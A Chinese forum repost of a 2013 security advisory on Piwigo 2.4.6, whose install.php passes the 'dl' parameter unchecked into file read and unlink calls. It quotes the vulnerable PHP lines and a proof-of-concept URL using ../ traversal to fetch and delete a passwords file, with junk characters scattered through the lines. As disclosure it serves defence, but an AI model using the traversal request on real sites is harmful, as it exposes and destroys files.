找回密码
 立即注册
查看: 3043|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。. ~+ q8 o1 F+ W* y/ B. N+ l& V
' F% ^1 t3 L! i
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
! b" }' e& L3 Y( w; \7 {====================================================================! k8 @' |* Q1 p# V, G% z/ w. l/ K  ^& J
/install.php:0 B+ B$ Q/ E" O/ z" }
-------------
( \* m5 g' b/ f6 g113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
) i/ M0 _9 e7 U# T2 u9 k4 j114: {
, o& K1 A& J0 p. f115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
. k! y* ^* I( E, d" Q6 a8 ^' O+ k116:   header('Cache-Control: no-cache, must-revalidate');2 ^0 x( K4 w1 Q* W4 N( m4 K% o
117:   header('Pragma: no-cache');& p# |7 m7 M1 z1 V/ C4 _5 X* _! U
118:   header('Content-Disposition: attachment; filename="database.inc.php"');3 o# E8 \- H. V, Z6 ~- i
119:   header('Content-Transfer-Encoding: binary');
5 K2 H5 l) l1 `1 f! x8 H120:   header('Content-Length: '.filesize($filename));
$ m6 i7 l( X  C& C! X: o: d1 F5 v121:   echo file_get_contents($filename);2 Q/ @" p9 n+ `6 c
122:   unlink($filename);
9 X1 V8 @! o) I$ b6 R123:   exit();, m, }( j3 W# x
124: }
0 [# l+ I% x; ]% g0 G2 h  ]  ?====================================================================
1 I% K& o; p4 a" h  e0 B& ` 7 M- |6 W- e" i1 V
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)2 F: {1 O' Q- H6 K  h- S6 q
           Apache 2.4.2 (Win32)
* d! }! a  c8 ]           PHP 5.4.4* |- E8 l0 Q3 a2 {0 h
           MySQL 5.5.25a! `* [6 n1 X; c+ [8 k

9 ~+ A, D( B* K5 Q- i. X7 M4 [Vulnerability discovered by Gjoko 'LiquidWorm' Krstic$ l) X8 X- p2 U
                            @zeroscience& a  r0 i" T: i. m; s+ z+ q+ n
! |. m4 @' L" m$ T
Advisory ID: ZSL-2013-5127
9 l4 z' j: j% T( J' IAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
5 ]& X- d2 _% Q1 X0 U, a; D4 AVendor Patch: http://piwigo.org/bugs/view.php?id=2843
/ v+ g: |- o: ?' H: j % r4 A7 ^' c/ R% E% v" f5 d
15.02.2013' _0 z6 R0 Z( Z& ]. N- f5 e8 n

! V0 d' \7 A  E7 _--( m8 g7 e+ U' V' T
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt2 c2 ?- }7 g0 p+ Y+ [

0 G. F% k- ?4 p8 T  F* G1 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表